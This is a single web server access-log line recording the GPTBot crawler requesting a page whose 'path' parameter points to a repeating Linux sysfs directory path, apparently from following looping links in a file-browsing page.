74.7.227.8 - - [16/Nov/2025:00:01:31 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/memory1/node0/power HTTP/1.0" 200 3552 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
